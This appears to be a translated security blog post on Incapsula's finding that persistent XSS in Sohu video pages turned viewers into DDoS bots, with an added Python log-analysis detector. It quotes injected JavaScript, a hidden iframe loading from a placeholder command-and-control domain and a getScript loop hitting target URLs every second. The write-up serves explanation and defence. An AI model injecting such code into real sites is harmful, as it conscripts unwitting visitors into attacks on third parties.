XSS attack: SOHU video XSS vulnerability causes its users to become DDOS bots

Source: Internet
Author: User
Tags: getscript

XSS (Cross Site Script), sometimes also abbreviated CSS, is a cross-site scripting attack: a malicious attacker inserts malicious HTML code into a web page, and when a user browses that page, the HTML code embedded in the page is executed in the user's browser, achieving whatever purpose the attacker intended.

From: http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html

Incapsula found that one of its customers had suffered a DDoS attack at the application layer.

About 22,000 Internet users sent 20 million GET requests to the customer's website.
The attack relies on a persistent XSS: by finding an XSS on a website with a large access volume and inserting a piece of JS code there, the attacker makes every user who visits that website launch requests against the attacker's chosen victims.

Several sample codes:
// JavaScript Injection in tag enabled by Persistent XSS

// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
  $("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>");
}

// Ajax DDoS tool in executes GET request every second
<script>
ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg');
function ddos(url, url2) {
  window.setInterval(function () {
    $.getScript(url);
    $.getScript(url2);
  }, 1000);
}
</script>
</body>
This attack method is very effective once an XSS is found on a video website with a large access volume: because the average video is not short, visitors stay on the page watching for a long period, and during that whole period the injected code sends requests to the victim websites without the viewer noticing.
Sohu video was used this time; it ranked 27th in global website traffic. XSS code could be inserted in the video area, so that users watching the video were made to send requests to the victims continuously.

Note: the attack requests the URL given as url and the URL given as url2 once every second. If a video lasts 30 minutes, every viewer sends 1800 meaningless attack requests (such as a CC attack) to the two targets during the viewing period; if tens of thousands of people watch a popular video...
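Seen from the victim site's access log, the loop above leaves a distinctive footprint: many different clients each fetching the same static resource about once a second, with the compromised video page (not the victim's own site) as the Referer. The following script is an added example, not code from the original post or from Incapsula: it parses constructed Apache combined-format log lines and flags client/resource pairs with a foreign Referer and a steady cadence. The IPs, host names and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse
# Constructed sample lines (Apache combined format), not real traffic. 203.0.113.5 fetches
# /1.jpg once a second with a foreign video page as Referer (the getScript loop's footprint);
# 192.0.2.9 has a foreign Referer but a slow cadence; 198.51.100.7 comes from our own site.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2014:10:00:00 +0000] "GET /1.jpg HTTP/1.1" 200 512 "http://video.example-site.test/watch?v=1" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2014:10:00:01 +0000] "GET /1.jpg HTTP/1.1" 200 512 "http://video.example-site.test/watch?v=1" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2014:10:00:02 +0000] "GET /1.jpg HTTP/1.1" 200 512 "http://video.example-site.test/watch?v=1" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2014:10:00:03 +0000] "GET /1.jpg HTTP/1.1" 200 512 "http://video.example-site.test/watch?v=1" "Mozilla/5.0"
192.0.2.9 - - [10/Apr/2014:10:00:00 +0000] "GET /1.jpg HTTP/1.1" 200 512 "http://blog.example-site.test/post/7" "Mozilla/5.0"
192.0.2.9 - - [10/Apr/2014:10:00:30 +0000] "GET /1.jpg HTTP/1.1" 200 512 "http://blog.example-site.test/post/7" "Mozilla/5.0"
192.0.2.9 - - [10/Apr/2014:10:01:00 +0000] "GET /1.jpg HTTP/1.1" 200 512 "http://blog.example-site.test/post/7" "Mozilla/5.0"
192.0.2.9 - - [10/Apr/2014:10:01:30 +0000] "GET /1.jpg HTTP/1.1" 200 512 "http://blog.example-site.test/post/7" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2014:10:00:00 +0000] "GET /1.jpg HTTP/1.1" 200 512 "http://www.target1.test/gallery" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
                     r'\d+ \S+ "(?P<referer>[^"]*)" "[^"]*"')

def parse_line(line):
    """Return (ip, timestamp, path, referer_host), or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], urlparse(m["referer"]).hostname or ""

def find_xss_ddos_clients(lines, own_hosts, min_requests=4, max_mean_gap=2.0):
    """Flag (ip, path) pairs fetched at a steady cadence while the Referer is a host we do not own."""
    stamps_by_key = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path, ref_host = parsed
        if ref_host and ref_host not in own_hosts:  # traffic referred from our own pages is normal
            stamps_by_key[(ip, path, ref_host)].append(ts)
    flagged = {}
    for (ip, path, ref_host), stamps in stamps_by_key.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean_gap = sum(gaps) / len(gaps)  # the injected loop fires every ~1 s
        if mean_gap <= max_mean_gap:
            flagged[(ip, path)] = {"count": len(stamps), "mean_gap": mean_gap, "referer_host": ref_host}
    return flagged
```

In a real deployment the flagged Referer host is the lead to follow up with the site that carries the injected script, and the (ip, path) pairs are candidates for rate limiting rather than blocking, since the clients are ordinary visitors of that site.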

